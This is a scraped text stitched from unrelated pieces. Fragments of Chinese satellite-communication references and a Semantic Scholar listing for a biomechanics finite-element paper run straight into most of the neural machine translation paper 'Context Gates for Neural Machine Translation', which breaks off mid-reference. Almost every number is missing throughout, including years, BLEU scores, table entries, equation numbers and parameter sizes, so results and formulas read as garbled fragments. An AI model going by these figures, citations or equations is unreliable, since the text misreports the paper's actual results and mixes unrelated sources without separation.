lv ziping, zhang gengxin, liang peng. the development and orientation of china’s geo and leo mobile satellite communications[j].digital communication world, ( ): - . [ ] xiao longlong, liang xiaojuan, li xin. the development and application of satellite mobile communication system. [pdf] probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry | semantic scholar skip to search formskip to main content> semantic scholar's logo search sign increate free account you are currently offline. some features of the site may not work correctly. doi: . /peerj-cs. corpus id: probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry @article{pataky probabilisticbf, title={probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry}, author={t. pataky and m. koseki and p. g. cox}, journal={peerj comput. sci.}, year={ }, volume={ }, pages={e } } t. pataky, m. koseki, p. g. cox published computer science peerj comput. sci. statistical analyses of biomechanical finite element (fe) simulations are frequently conducted on scalar metrics extracted from anatomically homologous regions, like maximum von mises stresses from demarcated bone areas. the advantages of this approach are numerical tabulability and statistical simplicity, but disadvantages include region demarcation subjectivity, spatial resolution reduction, and results interpretation complexity when attempting to mentally map tabulated results to original… expand view via publisher peerj.com save to library create alert cite launch research feed share this paper citations view all figures, tables, and topics from this paper figure figure table figure figure figure figure figure figure figure figure figure figure figure figure view all figures & tables simulation finite element method experiment homology (biology) table (database) quantum field theory computation demarcation point numerical analysis triune continuum paradigm iterative method request for tender computational anatomy stress ball citations citation type citation type all types cites results cites methods cites background has pdf publication type author more filters more filters filters sort by relevance sort by most influenced papers sort by citation count sort by recency a novel soft tissue prediction methodology for orthognathic surgery based on probabilistic finite element modelling p. knoops, a. borghi, + authors s. schievano computer science, medicine plos one pdf save alert research feed physical and statistical shape modelling in craniomaxillofacial surgery : a personalised approach for outcome prediction p. knoops medicine pdf save alert research feed references showing - of references sort byrelevance most influenced papers recency applying geometric morphometrics to compare changes in size and shape arising from finite elements analyses p. o'higgins, n. milne mathematics pdf view excerpt, references methods save alert research feed statistical methods in finite element analysis. f. h. dar, j. meakin, r. aspden engineering, medicine journal of biomechanics highly influential view excerpts, references methods save alert research feed validity and sensitivity of a human cranial finite element model: implications for comparative studies of biting performance viviana toro-ibacache, l. fitton, m. fagan, p. o'higgins biology, medicine journal of anatomy save alert research feed incorporating uncertainty in mechanical properties for finite element-based evaluation of bone mechanics. p. laz, j. q. stowe, m. baldwin, a. petrella, p. rullkoetter mathematics, medicine journal of biomechanics pdf save alert research feed the impact of simplifications on the performance of a finite element model of a macaca fascicularis cranium l. fitton, miguel prôa, charlie rowland, viviana toro-ibacache, p. o'higgins computer science, medicine anatomical record save alert research feed strain in the ostrich mandible during simulated pecking and validation of specimen‐specific finite element models e. rayfield geology, medicine journal of anatomy view excerpts, references background and methods save alert research feed the response of cranial biomechanical finite element models to variations in mesh density j. bright, e. rayfield computer science, medicine anatomical record save alert research feed finite element-based probabilistic analysis tool for orthopaedic applications s. easley, s. pal, paul r. tomaszewski, a. petrella, p. rullkoetter, p. laz computer science, medicine comput. methods programs biomed. save alert research feed finite element modelling of squirrel, guinea pig and rat skulls: using geometric morphometrics to assess sensitivity p. cox, m. fagan, e. rayfield, n. jeffery mathematics, medicine journal of anatomy view excerpt, references methods save alert research feed high‐resolution three‐dimensional computer simulation of hominid cranial mechanics s. wroe, k. moreno, p. clausen, c. mchenry, d. curnoe geology, medicine anatomical record save alert research feed ... ... related papers abstract figures, tables, and topics citations references related papers stay connected with semantic scholar sign up about semantic scholar semantic scholar is a free, ai-powered research tool for scientific literature, based at the allen institute for ai. learn more → resources datasetssupp.aiapiopen corpus organization about usresearchpublishing partnersdata partners   faqcontact proudly built by ai with the help of our collaborators terms of service•privacy policy the allen institute for ai by clicking accept or continuing to use the site, you agree to the terms outlined in our privacy policy, terms of service, and dataset license accept & continue context gates for neural machine translation zhaopeng tu† yang liu‡ zhengdong lu† xiaohua liu† hang li† †noah’s ark lab, huawei technologies, hong kong {tu.zhaopeng,lu.zhengdong,liuxiaohua ,hangli.hl}@huawei.com ‡department of computer science and technology, tsinghua university, beijing liuyang @tsinghua.edu.cn abstract in neural machine translation (nmt), genera- tion of a target word depends on both source and target contexts. we find that source con- texts have a direct impact on the adequacy of a translation while target contexts affect the flu- ency. intuitively, generation of a content word should rely more on the source context and generation of a functional word should rely more on the target context. due to the lack of effective control over the influence from source and target contexts, conventional nmt tends to yield fluent but inadequate transla- tions. to address this problem, we propose context gates which dynamically control the ratios at which source and target contexts con- tribute to the generation of target words. in this way, we can enhance both the adequacy and fluency of nmt with more careful con- trol of the information flow from contexts. experiments show that our approach signif- icantly improves upon a standard attention- based nmt system by + . bleu points. introduction neural machine translation (nmt) (kalchbrenner and blunsom, ; sutskever et al., ; bah- danau et al., ) has made significant progress in the past several years. its goal is to construct and utilize a single large neural network to accom- plish the entire translation task. one great advan- tage of nmt is that the translation system can be completely constructed by learning from data with- out human involvement (cf., feature engineering in statistical machine translation (smt)). the encoder- decoder architecture is widely employed (cho et al., input jı̄nnián qián liǎng yuè guǎngdōng gāoxı̄n jı̀shù chǎnpı̌n chūkǒu . yı̀ měiyuán nmt in the first two months of this year , the export of new high level technology product was unk - billion us dollars src china ’s guangdong hi - tech exports hit billion dollars tgt china ’s export of high and new hi - tech exports of the export of the export of the export of the export of the export of the export of the export of the export of · · · table : source and target contexts are highly cor- related to translation adequacy and fluency, respec- tively. src and tgt denote halving the contribu- tions from the source and target contexts when gen- erating the translation, respectively. ; sutskever et al., ), in which the encoder summarizes the source sentence into a vector repre- sentation, and the decoder generates the target sen- tence word-by-word from the vector representation. the representation of the source sentence and the representation of the partially generated target sen- tence (translation) at each position are referred to as source context and target context, respectively. the generation of a target word is determined jointly by the source context and target context. several techniques in nmt have proven to be very effective, including gating (hochreiter and schmidhuber, ; cho et al., ) and at- tention (bahdanau et al., ) which can model long-distance dependencies and complicated align- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ment relations in the translation process. using an encoder-decoder framework that incorporates gat- ing and attention techniques, it has been reported that the performance of nmt can surpass the per- formance of traditional smt as measured by bleu score (luong et al., ). despite this success, we observe that nmt usu- ally yields fluent but inadequate translations. we attribute this to a stronger influence of target con- text on generation, which results from a stronger language model than that used in smt. one ques- tion naturally arises: what will happen if we change the ratio of influences from the source or target con- texts? table shows an example in which an attention- based nmt system (bahdanau et al., ) gener- ates a fluent yet inadequate translation (e.g., missing the translation of “guǎngdōng”). when we halve the contribution from the source context, the result fur- ther loses its adequacy by missing the partial trans- lation “in the first two months of this year”. one possible explanation is that the target context takes a higher weight and thus the system favors a shorter translation. in contrast, when we halve the con- tribution from the target context, the result com- pletely loses its fluency by repeatedly generating the translation of “chūkǒu” (i.e., “the export of”) un- til the generated translation reaches the maximum length. therefore, this example indicates that source and target contexts in nmt are highly correlated to translation adequacy and fluency, respectively. in fact, conventional nmt lacks effective control on the influence of source and target contexts. at each decoding step, nmt treats the source and tar- get contexts equally, and thus ignores the different needs of the contexts. for example, content words in the target sentence are more related to the transla- tion adequacy, and thus should depend more on the source context. in contrast, function words in the target sentence are often more related to the trans- lation fluency (e.g., “of” after “is fond”), and thus should depend more on the target context. in this work, we propose to use context gates to control the contributions of source and target con- texts on the generation of target words (decoding) fluency measures whether the translation is fluent, while adequacy measures whether the translation is faithful to the original sentence (snover et al., ). figure : architecture of decoder rnn. in nmt. context gates are non-linear gating units which can dynamically select the amount of context information in the decoding process. specifically, at each decoding step, the context gate examines both the source and target contexts, and outputs a ratio between zero and one to determine the percentages of information to utilize from the two contexts. in this way, the system can balance the adequacy and fluency of the translation with regard to the genera- tion of a word at each position. experimental results show that introducing con- text gates leads to an average improvement of + . bleu points over a standard attention-based nmt system (bahdanau et al., ). an interesting find- ing is that we can replace the gru units in the de- coder with conventional rnn units and in the mean- time utilize context gates. the translation perfor- mance is comparable with the standard nmt system with gru, but the system enjoys a simpler structure (i.e., uses only a single gate and half of the param- eters) and a faster decoding (i.e., requires only half the matrix computations for decoding). neural machine translation suppose that x = x , . . .xj, . . .xj represents a source sentence and y = y , . . .yi, . . .yi a target sentence. nmt directly models the probability of translation from the source sentence to the target sentence word by word: p(y|x) = i∏ i= p(yi|y<i,x) ( ) our code is publicly available at https://github. com/tuzhaopeng/nmt. where y<i = y , . . . ,yi− . as shown in figure , the probability of generating the i-th word yi is com- puted by using a recurrent neural network (rnn) in the decoder: p(yi|y<i,x) = g(yi− , ti,si) ( ) where g(·) first linearly transforms its input then ap- plies a softmax function, yi− is the previously gen- erated word, ti is the i-th decoding hidden state, and si is the i-th source representation. the state ti is computed as follows: ti = f(yi− , ti− ,si) = f(we(yi− ) + uti− + csi) ( ) where • f(·) is a function to compute the current de- coding state given all the related inputs. it can be either a vanilla rnn unit using tanh func- tion, or a sophisticated gated rnn unit such as gru (cho et al., ) or lstm (hochreiter and schmidhuber, ). • e(yi− ) ∈ rm is an m-dimensional embedding of the previously generated word yi− . • si is a vector representation extracted from the source sentence by the encoder. the encoder usually uses an rnn to encode the source sentence x into a sequence of hidden states h = h , . . .hj, . . .hj , in which hj is the hidden state of the j-th source word xj. si can be either a static vector that summarizes the whole sentence (e.g., si ≡ hj ) (cho et al., ; sutskever et al., ), or a dy- namic vector that selectively summarizes cer- tain parts of the source sentence at each decod- ing step (e.g., si = ∑j j= αi,jhj in which αi,j is alignment probability calculated by an atten- tion model) (bahdanau et al., ). • w ∈ rn×m, u ∈ rn×n, c ∈ rn×n′ are matri- ces with n and n′ being the numbers of units of decoder hidden state and source representation, respectively. the inputs to the decoder (i.e., si, ti− , and yi− ) represent the contexts. specifically, the source rep- resentation si stands for source context, which em- beds the information from the source sentence. the (a) lengths of translations in words. (b) subjective evaluation. figure : effects of source and target contexts. the pair (a,b) in the legends denotes scaling source and target contexts with ratios a and b respectively. previous decoding state ti− and the previously gen- erated word yi− constitute the target context. . effects of source and target contexts we first empirically investigate our hypothesis: whether source and target contexts correlate to trans- lation adequacy and fluency. figure (a) shows the translation lengths with various scaling ratios (a,b) in a recent implementation of nmt (https: //github.com/nyu-dl/dl mt-tutorial), ti− and yi− are combined together with a gru before being fed into the decoder, which can boost translation performance. we follow the practice and treat both of them as target context. for source and target contexts: ti = f(b⊗ (we(yi− ) + uti− ) + a⊗csi) for example, the pair ( . , . ) means fully lever- aging the effect of source context while halving the effect of target context. reducing the effect of tar- get context (i.e., the lines ( . , . ) and ( . , . )) results in longer translations, while reducing the ef- fect of source context (i.e., the lines ( . , . ) and ( . , . )) leads to shorter translations. when halv- ing the effect of the target context, most of the gener- ated translations reach the maximum length, which is three times the length of source sentence in this work. figure (b) shows the results of manual evalu- ation on source sentences randomly sampled from the test sets. reducing the effect of source con- text (i.e., ( . , . ) and ( . , . )) leads to more flu- ent yet less adequate translations. on the other hand, reducing the effect of target context (i.e., ( . , . ) and ( . , . )) is expected to yield more adequate but less fluent translations. in this setting, the source words are translated (i.e., higher adequacy) while the translations are in wrong order (i.e., lower flu- ency). in practice, however, we observe the side ef- fect that some source words are translated repeatedly until the translation reaches the maximum length (i.e., lower fluency), while others are left untrans- lated (i.e., lower adequacy). the reason is two fold: . nmt lacks a mechanism that guarantees that each source word is translated. the decod- ing state implicitly models the notion of “cover- age” by recurrently reading the time-dependent source context si. lowering its contribution weakens the “coverage” effect and encour- ages the decoder to regenerate phrases multiple times to achieve the desired translation length. . the translation is incomplete. as shown in ta- ble , nmt can get stuck in an infinite loop repeatedly generating a phrase due to the over- whelming influence of the source context. as a result, generation terminates early because the recently proposed coverage based technique can allevi- ate this problem (tu et al., ). in this work, we consider an- other approach, which is complementary to the coverage mech- anism. figure : architecture of context gate. the translation reaches the maximum length al- lowed by the implementation, even though the decoding procedure is not finished. the quantitative (figure ) and qualitative (ta- ble ) results confirm our hypothesis, i.e., source and target contexts are highly correlated to translation adequacy and fluency. we believe that a mechanism that can dynamically select information from source context and target context would be useful for nmt models, and this is exactly the approach we propose. context gates . architecture inspired by the success of gated units in rnn (hochreiter and schmidhuber, ; cho et al., ), we propose using context gates to dynamically control the amount of information flowing from the source and target contexts and thus balance the fluency and adequacy of nmt at each decoding step. intuitively, at each decoding step i, the context gate looks at input signals from both the source (i.e., si) and target (i.e., ti− and yi− ) sides, and outputs a number between and for each element in the input vectors, where denotes “completely trans- ferring this” while denotes “completely ignoring this”. the corresponding input signals are then pro- cessed with an element-wise multiplication before being fed to the activation layer to update the decod- ing state. formally, a context gate consists of a sigmoid neural network layer and an element-wise multipli- cation operation, as illustrated in figure . the con- text gate assigns an element-wise weight to the input (a) context gate (source) (b) context gate (target) (c) context gate (both) figure : architectures of nmt with various context gates, which either scale only one side of translation contexts (i.e., source context in (a) and target context in (b)) or control the effects of both sides (i.e., (c)). signals, computed by zi = σ(wze(yi− ) + uzti− + czsi) ( ) here σ(·) is a logistic sigmoid function, and wz ∈ rn×m, uz ∈ rn×n, cz ∈ rn×n ′ are the weight matrices. again, m, n and n′ are the dimensions of word embedding, decoding state, and source rep- resentation, respectively. note that zi has the same dimensionality as the transferred input signals (e.g., csi), and thus each element in the input vectors has its own weight. . integrating context gates into nmt next, we consider how to integrate context gates into an nmt model. the context gate can decide the amount of con- text information used in generating the next target word at each step of decoding. for example, after obtaining the partial translation “. . . new high level technology product”, the gate looks at the translation contexts and decides to depend more heavily on the source context. accordingly, the gate assigns higher weights to the source context and lower weights to the target context and then feeds them into the de- coding activation layer. this could correct inade- quate translations, such as the missing translation of “guǎngdōng”, due to greater influence from the tar- get context. we have three strategies for integrating context gates into nmt that either affect one of the transla- tion contexts or both contexts, as illustrated in fig- ure . the first two strategies are inspired by out- put gates in lstms (hochreiter and schmidhuber, ), which control the amount of memory content utilized. in these kinds of models, zi only affects either source context (i.e., si) or target context (i.e., yi− and ti− ): • context gate (source) ti = f ( we(yi− ) + uti− + zi ◦csi ) • context gate (target) ti = f ( zi ◦ (we(yi− ) + uti− ) + csi ) where ◦ is an element-wise multiplication, and zi is the context gate calculated by equation . this is also essentially similar to the reset gate in the gru, which decides what information to forget from the previous decoding state before transferring that in- formation to the decoding activation layer. the dif- ference is that here the “reset” gate resets the context vector rather than the previous decoding state. the last strategy is inspired by the concept of up- date gate from gru, which takes a linear sum be- tween the previous state ti− and the candidate new state t̃i. in our case, we take a linear interpolation between source and target contexts: • context gate (both) ti = f ( ( −zi)◦ (we(yi− ) + uti− ) + zi ◦csi ) (a) gating scalar (b) context gate figure : comparison to gating scalar proposed by xu et al. ( ). related work comparison to (xu et al., ): context gates are inspired by the gating scalar model proposed by xu et al. ( ) for the image caption genera- tion task. the essential difference lies in the task requirement: • in image caption generation, the source side (i.e., image) contains more information than the target side (i.e., caption). therefore, they em- ploy a gating scalar to scale only the source context. • in machine translation, both languages should contain equivalent information. our model jointly controls the contributions from the source and target contexts. a direct interaction between input signals from both sides is useful for balancing adequacy and fluency of nmt. other differences in the architecture include: xu et al. ( ) uses a scalar that is shared by all elements in the source context, while we employ a gate with a distinct weight for each el- ement. the latter offers the gate a more precise control of the context vector, since different el- ements retain different information. we add peephole connections to the architec- ture, by which the source context controls the gate. it has been shown that peephole connec- tions make precise timings easier to learn (gers and schmidhuber, ). our context gate also considers the previously generated word yi− as input. the most re- cently generated word can help the gate to bet- ter estimate the importance of target context, especially for the generation of function words in translations that may not have a correspond- ing word in the source sentence (e.g., “of” after “is fond”). experimental results (section . ) show that these modifications consistently improve translation qual- ity. comparison to gated rnn: state-of-the-art nmt models (sutskever et al., ; bahdanau et al., ) generally employ a gated unit (e.g., gru or lstm) as the activation function in the decoder. one might suspect that the context gate proposed in this work is somewhat redundant, given the existing gates that control the amount of information carried over from the previous decoding state si− (e.g., re- set gate in gru). we argue that they are in fact com- plementary: the context gate regulates the contextual information flowing into the decoding state, while the gated unit captures long-term dependencies be- tween decoding states. our experiments confirm the correctness of our hypothesis: the context gate not only improves translation quality when compared to a conventional rnn unit (e.g., an element-wise tanh), but also when compared to a gated unit of gru, as shown in section . . comparison to coverage mechanism: re- cently, tu et al. ( ) propose adding a coverage mechanism into nmt to alleviate over-translation and under-translation problems, which directly affect translation adequacy. they maintain a cov- erage vector to keep track of which source words have been translated. the coverage vector is fed to the attention model to help adjust future attention. this guides nmt to focus on the un-translated source words while avoiding repetition of source content. our approach is complementary: the cov- erage mechanism produces a better source context representation, while our context gate controls the effect of the source context based on its relative importance. experiments in section . show that combining the two methods can further improve translation performance. there is another difference as well: the coverage mechanism is only applicable to attention-based nmt models, while the context gate is applicable to all nmt models. comparison to exploiting auxiliary contexts in language modeling: a thread of work in lan- guage modeling (lm) attempts to exploit auxiliary sentence-level or document-level context in an rnn lm (mikolov and zweig, ; ji et al., ; wang and cho, ). independent of our work, wang and cho ( ) propose “early fusion” models of rnns where additional information from an inter- sentence context is “fused” with the input to the rnn. closely related to wang and cho ( ), our approach aims to dynamically control the contribu- tions of required source and target contexts for ma- chine translation, while theirs focuses on integrating auxiliary corpus-level contexts for language mod- elling to better approximate the corpus-level prob- ability. in addition, we employ a gating mechanism to produce a dynamic weight at different decoding steps to combine source and target contexts, while they do a linear combination of intra-sentence and inter-sentence contexts with static weights. exper- iments in section . show that our gating mech- anism significantly outperforms linear interpolation when combining contexts. comparison to handling null-generated words in smt: in machine translation, there are certain syntactic elements of the target language that are missing in the source (i.e., null-generated words). in fact this was the preliminary motivation for our approach: current attention models lack a mecha- nism to control the generation of words that do not have a strong correspondence on the source side. the model structure of nmt is quite similar to the traditional word-based smt (brown et al., ). therefore, techniques that have proven effective in smt may also be applicable to nmt. toutanova et al. ( ) extend the calculation of translation prob- abilities to include null-generated target words in word-based smt. these words are generated based on both the special source token null and the neigh- bouring word in the target language by a mixture model. we have simplified and generalized their ap- proach: we use context gates to dynamically control the contribution of source context. when produc- ing null-generated words, the context gate can as- sign lower weights to the source context, by which the source-side information have less influence. in a sense, the context gate relieves the need for a null state in attention. experiments . setup we carried out experiments on chinese-english translation. the training dataset consisted of . m sentence pairs extracted from ldc corpora , with . m chinese words and . m english words re- spectively. we chose the nist (mt ) dataset as the development set, and the nist (mt ), (mt ) and (mt ) datasets as the test sets. we used the case-insensitive -gram nist bleu score (papineni et al., ) as the evalua- tion metric, and sign-test (collins et al., ) for the statistical significance test. for efficient training of the neural networks, we limited the source and target vocabularies to the most frequent k words in chinese and english, covering approximately . % and . % of the data in the two languages respectively. all out-of- vocabulary words were mapped to a special token unk. we trained each model on sentences of length up to words in the training data. the word em- bedding dimension was and the size of a hid- den layer was . we trained our models until the bleu score on the development set stops improv- ing. we compared our method with representative smt and nmt models: • moses (koehn et al., ): an open source phrase-based translation system with default configuration and a -gram language model trained on the target portion of training data; • groundhog (bahdanau et al., ): an open source attention-based nmt model with de- fault setting. we have two variants that differ in the activation function used in the decoder the corpora include ldc e , ldc e , ldc e , hansards portion of ldc t , ldc t and ldc t . there is some recent progress on aggregating multiple models or enlarging the vocabulary(e.g.,, in (jean et al., )), but here we focus on the generic models. # system #parameters mt mt mt ave. moses – . . . . groundhog (vanilla) . m . . . . + context gate (both) . m . ∗ . ∗ . ∗ . groundhog (gru) . m . . . . + context gate (source) . m . ∗ . ∗ . ∗ . + context gate (target) . m . ∗ . ∗ . . + context gate (both) . m . ∗ . ∗ . ∗ . groundhog-coverage (gru) . m . . . . + context gate (both) . m . ∗ . ∗ . ∗ . table : evaluation of translation quality measured by case-insensitive bleu score. “groundhog (vanilla)” and “groundhog (gru)” denote attention-based nmt (bahdanau et al., ) and uses a sim- ple tanh function or a sophisticated gate function gru respectively as the activation function in the de- coder rnn. “groundhog-coverage” denotes attention-based nmt with a coverage mechanism to indicate whether a source word is translated or not (tu et al., ). “*” indicate statistically significant difference (p < . ) from the corresponding nmt variant. “ + context gate (both)” denotes integrating “context gate (both)” into the baseline system in row (i.e., “groundhog (vanilla)”). rnn: ) groundhog (vanilla) uses a simple tanh function as the activation function, and ) groundhog (gru) uses a sophisticated gate function gru; • groundhog-coverage (tu et al., ) : an improved attention-based nmt model with a coverage mechanism. . translation quality table shows the translation performances in terms of bleu scores. we carried out experiments on multiple nmt variants. for example, “ + context gate (both)” in row denotes integrating “con- text gate (both)” into the baseline in row (i.e., groundhog (vanilla)). for baselines, we found that the gated unit (i.e., gru, row ) indeed surpasses its vanilla counterpart (i.e., tanh, row ), which is consistent with the results in other work (chung et al., ). clearly the proposed context gates significantly improve the translation quality in all cases, although there are still considerable differ- ences among the variants: parameters context gates introduce a few new parameters. the newly introduced parameters in- clude wz ∈ rn×m, uz ∈ rn×n, cz ∈ rn×n ′ in https://github.com/tuzhaopeng/ nmt-coverage. equation . in this work, the dimensionality of the decoding state is n = , the dimensionality of the word embedding is m = , and the dimen- sionality of context representation is n′ = . the context gates only introduce . m additional param- eters, which is quite small compared to the number of parameters in the existing models (e.g., . m in the “groundhog (gru)”). over groundhog (vanilla) we first carried out experiments on a simple decoder without gating function (rows and ), to better estimate the im- pact of context gates. as shown in table , the proposed context gate significantly improved trans- lation performance by . bleu points on average. it is worth emphasizing that context gate even out- performs a more sophisticated gating function (i.e., gru in row ). this is very encouraging, since our model only has a single gate with half of the param- eters (i.e., . m versus . m) and less computations (i.e., half the matrix computations to update the de- coding state ). we only need to calculate the context gate once via equa- tion and then apply it when updating the decoding state. in contrast, gru requires the calculation of an update gate, a re- set gate, a proposed updated decoding state and an interpolation between the previous state and the proposed state. please refer to (cho et al., ) for more details. groundhog vs. groundhog+context gate adequacy fluency < = > < = > evaluator . % . % . % . % . % . % evaluator . % . % . % . % . % . % table : subjective evaluation of translation adequacy and fluency. over groundhog (gru) we then investigated the effect of the context gates on a standard nmt with gru as the decoding activation function (rows - ). several observations can be made. first, con- text gates also boost performance beyond the gru in all cases, demonstrating our claim that context gates are complementary to the reset and update gates in gru. second, jointly controlling the infor- mation from both translation contexts consistently outperforms its single-side counterparts, indicating that a direct interaction between input signals from the source and target contexts is useful for nmt models. over groundhog-coverage (gru) we finally tested on a stronger baseline, which employs a cov- erage mechanism to indicate whether or not a source word has already been translated (tu et al., ). our context gate still achieves a significant improve- ment of . bleu points on average, reconfirm- ing our claim that the context gate is complemen- tary to the improved attention model that produces a better source context representation. finally, our best model (row ) outperforms the smt baseline system using the same data (row ) by . bleu points. from here on, we refer to “groundhog” for “groundhog (gru)”, and “context gate” for “context gate (both)” if not otherwise stated. subjective evaluation we also conducted a sub- jective evaluation of the benefit of incorporating context gates. two human evaluators were asked to compare the translations of source sentences randomly sampled from the test sets without know- ing which system produced each translation. table shows the results of subjective evaluation. the two human evaluators made similar judgments: in ade- quacy, around % of groundhog translations are worse, % are equal, and % are better; while in system saer aer groundhog . . + context gate . . groundhog-coverage . . + context gate . . table : evaluation of alignment quality. the lower the score, the better the alignment quality. fluency, around % are worse, % are equal, and % are better. . alignment quality table lists the alignment performances. follow- ing tu et al. ( ), we used the alignment error rate (aer) (och and ney, ) and its variant saer to measure the alignment quality: saer = − |ma ×ms|+ |ma ×mp ||ma|+ |ms| where a is a candidate alignment, and s and p are the sets of sure and possible links in the refer- ence alignment respectively (s ⊆ p ). m denotes the alignment matrix, and for both ms and mp we assign the elements that correspond to the existing links in s and p probability and the other elements probability . in this way, we are able to better eval- uate the quality of the soft alignments produced by attention-based nmt. we find that context gates do not improve align- ment quality when used alone. when combined with coverage mechanism, however, it produces bet- ter alignments, especially one-to-one alignments by selecting the source word with the highest align- ment probability per target word (i.e., aer score). one possible reason is that better estimated decod- ing states (from the context gate) and coverage in- formation help to produce more concentrated align- ments, as shown in figure . (a) groundhog-coverage (saer= . ) (b) + context gate (saer= . ) figure : example alignments. incorporating context gate produces more concentrated alignments. # system gate inputs mt mt mt ave. groundhog – . . . . + gating scalar ti− . ∗ . . . + context gate (source) ti− . ∗ . . ∗ . + context gate (both) ti− . ∗ . ∗ . ∗ . ti− , si . ∗ . ∗ . ∗ . ti− , si, yi− . ∗ . ∗ . ∗ . table : analysis of the model architectures measured in bleu scores. “gating scalar” denotes the model proposed by (xu et al., ) in the image caption generation task, which looks at only the previous decod- ing state ti− and scales the whole source context si at the vector-level. to investigate the effect of each component, we list the results of context gate variants with different inputs (e.g., the previously generated word yi− ). “*” indicates statistically significant difference (p < . ) from “groundhog”. . architecture analysis table shows a detailed analysis of architecture components measured in bleu scores. several ob- servations can be made: • operation granularity (rows and ): element-wise multiplication (i.e., context gate (source)) outperforms the vector-level scalar (i.e., gating scalar), indicating that precise control of each element in the context vector boosts translation performance. • gate strategy (rows and ): when only fed with the previous decoding state ti− , context gate (both) consistently outperforms context gate (source), showing that jointly controlling information from both source and target sides is important for judging the importance of the contexts. • peephole connections (rows and ): peep- holes, by which the source context si controls the gate, play an important role in the context gate, which improves the performance by . in bleu score. • previously generated word (rows and ): previously generated word yi− provides a more explicit signal for the gate to judge the importance of contexts, leading to a further im- provement on translation performance. . effects on long sentences we follow bahdanau et al. ( ) and group sen- tences of similar lengths together. figure shows figure : performance of translations on the test set with respect to the lengths of the source sentences. context gate improves performance by alleviating in-adequate translations on long sentences. the bleu score and the averaged length of trans- lations for each group. groundhog performs very well on short source sentences, but degrades on long source sentences (i.e., > ), which may be due to the fact that source context is not fully interpreted. context gates can alleviate this problem by balanc- ing the source and target contexts, and thus improve decoder performance on long sentences. in fact, in- corporating context gates boost translation perfor- mance on all source sentence groups. we confirm that context gate weight zi correlates well with translation performance. in other words, translations that contain higher zi (i.e., source con- text contributes more than target context) at many time steps are better in translation performance. we used the mean of the sequence z , . . . ,zi, . . . ,zi as the gate weight of each sentence. we calculated the pearson correlation between the sentence-level gate weight and the corresponding improvement on translation performance (i.e., bleu, adequacy, and fluency scores), as shown in table . we observed that context gate weight is positively correlated with translation performance improvement and that the correlation is higher on long sentences. as an example, consider this source sentence from the test set: we use the average of correlations on subjective evaluation metrics (i.e., adequacy and fluency) by two evaluators. length bleu adequacy fluency < . . . > . . . table : correlation between context gate weight and improvement of translation performance. “length” denotes the length of source sentence. “bleu”, “adequacy”, and “fluency” denotes different metrics measuring the translation perfor- mance improvement of using context gates. zhōuliù zhèngshı̀ yı̄ngguó mı́nzhòng dào chāoshı̀ cǎigòu de gāofēng shı́kè, dāngshı́ jiā chāoshı̀ de guānbı̀ lı̀ng yı̄ngguó zhè jiā zuı̀ dà de liánsuǒ chāoshı̀ sǔnshı̄ shùbǎiwàn yı̄ngbàng de xiāoshòu shōurù . groundhog translates it into: twenty - six london supermarkets were closed at a peak hour of the british pop- ulation in the same period of time . which almost misses all the information of the source sentence. integrating context gates improves the translation adequacy: this is exactly the peak days british peo- ple buying the supermarket . the closure of the supermarkets of the super- markets that the largest chain supermar- ket in england lost several million pounds of sales income . coverage mechanisms further improve the transla- tion by rectifying over-translation (e.g., “of the supermarkets”) and under-translation (e.g., “satur- day” and “at that time”): saturday is the peak season of british peo- ple ’s purchases of the supermarket . at that time , the closure of supermarkets made the biggest supermarket of britain lose millions of pounds of sales income . conclusion we find that source and target contexts in nmt are highly correlated to translation adequacy and flu- ency, respectively. based on this observation, we propose using context gates in nmt to dynamically control the contributions from the source and target contexts in the generation of a target sentence, to enhance the adequacy of nmt. by providing nmt the ability to choose the appropriate amount of in- formation from the source and target contexts, one can alleviate many translation problems from which nmt suffers. experimental results show that nmt with context gates achieves consistent and signifi- cant improvements in translation quality over differ- ent nmt models. context gates are in principle applicable to all sequence-to-sequence learning tasks in which infor- mation from the source sequence is transformed to the target sequence (corresponding to adequacy) and the target sequence is generated (corresponding to fluency). in the future, we will investigate the ef- fectiveness of context gates to other tasks, such as dialogue and summarization. it is also necessary to validate the effectiveness of our approach on more language pairs and other nmt architectures (e.g., using lstm as well as gru, or multiple layers). acknowledgement this work is supported by china national project cb . yang liu is supported by the national natural science foundation of china (no. ) and the program ( aa ). we thank action editor chris quirk and three anonymous reviewers for their in- sightful comments. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. iclr . peter e. brown, stephen a. della pietra, vincent j. della pietra, and robert l. mercer. . the mathematics of statistical machine translation: parameter estima- tion. computational linguistics, ( ): – . kyunghyun cho, bart van merrienboer, caglar gulcehre, fethi bougares, holger schwenk, and yoshua ben- gio. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in emnlp . junyoung chung, caglar gulcehre, kyunghyun cho, and yoshua bengio. . empirical evaluation of gated recurrent neural networks on sequence model- ing. arxiv. michael collins, philipp koehn, and ivona kučerová. . clause restructuring for statistical machine translation. in acl . felix a gers and jürgen schmidhuber. . recurrent nets that time and count. in ijcnn . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation. sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in acl . yangfeng ji, trevor cohn, lingpeng kong, chris dyer, and jacob eisenstein. . document context lan- guage models. in iclr . nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in emnlp . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondrej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in acl . minh-thang luong, hieu pham, and christopher d. manning. . effective approaches to attention- based neural machine translation. in emnlp . tomas mikolov and geoffrey zweig. . context de- pendent recurrent neural network language model. in slt . franz j. och and hermann ney. . a systematic comparison of various statistical alignment models. computational linguistics, ( ): – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in acl . matthew snover, nitin madnani, bonnie j dorr, and richard schwartz. . fluency, adequacy, or hter?: exploring different human judgments with a tunable mt metric. in proceedings of the fourth workshop on statistical machine translation, pages – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips . kristina toutanova, h. tolga ilhan, and christopher d. manning. . extensions to hmm-based statistical word alignment models. in 